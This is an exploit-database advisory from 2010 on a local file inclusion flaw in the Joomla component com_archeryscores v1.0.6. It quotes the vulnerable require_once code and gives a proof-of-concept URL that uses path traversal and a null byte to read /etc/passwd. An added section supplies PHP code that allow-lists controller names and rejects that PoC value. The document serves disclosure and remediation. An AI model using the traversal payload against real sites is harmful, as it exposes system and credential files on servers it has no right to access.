Joomla Component com_archeryscores v1.0.6 LFI Vulnerability

2010-04-18T00:00:00
ID 1337DAY-ID-11878
Type zdt
Reporter LionTurk
Modified 2010-04-18T00:00:00

Description

Exploit for PHP platform in category web applications

                                        

================================================================================================
 
 Title    : Joomla Component Archery Scores (com_archeryscores) v1.0.6 LFI Vulnerability
 Vendor   : http://lispeltuut.org/
 Download : http://lispeltuut.org/archery-scores/download
 
 Date     : Sunday, 18 April 2010 - GMT +07:00 Jakarta, Indonesia
 Author   : wishnusakti + inc0mp13te (HH)
 Contact  : evileyes60117[at]yahoo.com
 
 ================================================================================================
 
 [+] Vulnerable
 
     ./components/com_archeryscores/archeryscores.php
 
     Line 22: if($controller = JRequest::getVar('controller')) {
     Line 23:   require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
     Line 24: }
 
 [+] Exploit
 
     http://[site]/[path]/index.php?option=com_archeryscores&controller=[LFI]
 
 [+] PoC
 
     http://localhost/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
 
 ================================================================================================
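
The `require_once` on lines 22-24 builds a file path directly from the raw `controller` parameter. As an added example (not part of the original advisory and not the component's own code), the sketch below allow-lists the name and confirms the resolved path stays under `controllers/` before anything is loaded. `resolveController()` and the temporary directory layout are hypothetical names used for a constructed demo.

```php
<?php
// Added example (hypothetical helper, not the component's code): map a
// request-supplied controller name to a file under controllers/ without
// letting the name escape that directory.

function resolveController(string $controllersDir, $name): ?string
{
    // 1. Allow-list the name: letters, digits, underscore only. \A and \z
    //    anchor the whole string, so separators, dots, NUL bytes and a
    //    trailing newline are all rejected before any path is built.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name)) {
        return null;
    }

    // 2. Canonicalise and confirm the result is still inside controllers/.
    $base = realpath($controllersDir);
    $path = realpath($controllersDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;                    // directory or controller file missing
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                    // e.g. a symlink pointing elsewhere
    }
    return $path;
}

// Constructed demo: a throwaway controllers/ directory with one controller.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ctl_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'scores.php', "<?php\n");

$samples = [
    'scores',                           // legitimate controller
    '../../../../etc/passwd' . "\0",    // decoded shape of the PoC value above
    'scores.php',                       // dots are not allowed
    ['scores'],                         // array-valued parameter
    'missing',                          // passes the allow-list, no such file
];
foreach ($samples as $s) {
    $r = resolveController($dir, $s);
    printf("%-36s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
           $r === null ? 'rejected' : 'load ' . basename($r));
}

unlink($dir . DIRECTORY_SEPARATOR . 'scores.php');
rmdir($dir);
```

Inside Joomla 1.5 the same allow-listing is available by reading the parameter with `JRequest::getWord('controller')` instead of `JRequest::getVar('controller')`, which strips everything except letters and underscores.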


